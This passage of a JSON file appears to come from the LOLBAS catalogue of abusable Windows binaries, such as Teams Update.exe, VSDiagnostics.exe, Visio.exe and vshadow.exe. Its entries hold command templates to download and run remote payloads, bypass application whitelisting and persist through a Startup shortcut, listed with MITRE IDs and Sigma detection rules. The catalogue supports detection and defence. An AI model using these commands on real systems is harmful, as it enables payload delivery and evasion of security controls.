default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"}],"references":["https://twitter.com/subTee/status/793151392185589760","https://attack.mitre.org/wiki/Execution","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"]},{"id":"lolbas:update-exe:0","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Update.exe --download {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file and download the nuget package.","usecase":"Download binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:1","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --update={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:2","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --update={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:3","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --update={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:4","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --update={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:5","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:6","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:7","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --processStart {PATH:.exe} --process-start-args \"{CMD:args}\"","description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","usecase":"Application Whitelisting Bypass","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:8","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Update.exe --updateRollback={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:9","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --updateRollback={PATH_SMB:folder}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:10","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --processStart {PATH:.exe} --process-start-args \"{CMD:args}\"","description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","usecase":"Execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:11","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --createShortcut={PATH:.exe} -l=Startup","description":"Copy your payload into \"%localappdata%\\Microsoft\\Teams\\current\\\". Then run the command. Update.exe will create a shortcut to the specified executable in \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\". Then payload will run on every login of the user who runs it.","usecase":"Execute binary","mitre":["T1547"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:update-exe:12","toolId":"lolbas:update-exe","toolName":"Update.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Update.exe --removeShortcut={PATH:.exe}-l=Startup","description":"Run the command to remove the shortcut created in the \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" directory you created with the LolBinExecution \"--createShortcut\" described on this page.","usecase":"Execute binary","mitre":["T1070"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"type":"IOC","value":"Update.exe spawned an unknown process"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"]},{"id":"lolbas:vsdiagnostics-exe:0","toolId":"lolbas:vsdiagnostics-exe","toolName":"VSDiagnostics.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSDiagnostics.exe start 1 /launch:{PATH:.exe}","description":"Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable.","usecase":"Proxy execution of binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml"}],"references":["https://twitter.com/0xBoku/status/1679200664013135872","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"]},{"id":"lolbas:vsdiagnostics-exe:1","toolId":"lolbas:vsdiagnostics-exe","toolName":"VSDiagnostics.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:\"{CMD:args}\"","description":"Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.","usecase":"Proxy execution of binary with arguments","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml"}],"references":["https://twitter.com/0xBoku/status/1679200664013135872","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"]},{"id":"lolbas:vsiisexelauncher-exe:0","toolId":"lolbas:vsiisexelauncher-exe","toolName":"VSIISExeLauncher.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSIISExeLauncher.exe -p {PATH:.exe} -a \"{CMD:args}\"","description":"The above binary will execute other binary.","usecase":"Execute any binary with given arguments.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml"},{"type":"IOC","value":"VSIISExeLauncher.exe spawned an unknown process"}],"references":["https://github.com/timwhitez","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"]},{"id":"lolbas:visio-exe:0","toolId":"lolbas:visio-exe","toolName":"Visio.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Visio.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a visio.exe command line"},{"type":"IOC","value":"visio.exe making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"]},{"id":"lolbas:visualuiaverifynative-exe:0","toolId":"lolbas:visualuiaverifynative-exe","toolName":"VisualUiaVerifyNative.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"VisualUiaVerifyNative.exe","description":"Generate Serialized gadget and save to - `C:\\Users\\%USERNAME%\\AppData\\Roaminguiverify.config` before executing.","usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1218"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\UIAVerify\\VisualUiaVerifyNative.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/","https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"]},{"id":"lolbas:vslaunchbrowser-exe:0","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"VSLaunchBrowser.exe .exe {REMOTEURL:.exe}","description":"Download and execute payload from remote server","usecase":"It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"]},{"id":"lolbas:vslaunchbrowser-exe:1","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}","description":"Execute payload via VSLaunchBrowser as parent process","usecase":"It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"]},{"id":"lolbas:vslaunchbrowser-exe:2","toolId":"lolbas:vslaunchbrowser-exe","toolName":"VSLaunchBrowser.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"VSLaunchBrowser.exe .exe {PATH_SMB}","description":"Execute payload from WebDAV server via VSLaunchBrowser as parent process","usecase":"It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"cmd.exe as sub-process of VSLaunchBrowser"},{"type":"IOC","value":"URL on a VSLaunchBrowser command line"},{"type":"IOC","value":"VSLaunchBrowser making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"]},{"id":"lolbas:vshadow-exe:0","toolId":"lolbas:vshadow-exe","toolName":"Vshadow.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:","description":"Executes specified executable from vshadow.exe.","usecase":"Performs execution of specified executable file.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\vshadow.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_vshadow_exec.yml"},{"type":"IOC","value":"vshadow.exe usage with -exec parameter"}],"references":["https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"]},{"id":"lolbas:vsjitdebugger-exe:0","toolId":"lolbas:vsjitdebugger-exe","toolName":"vsjitdebugger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Vsjitdebugger.exe {PATH:.exe}","description":"Executes specified executable as a subprocess of 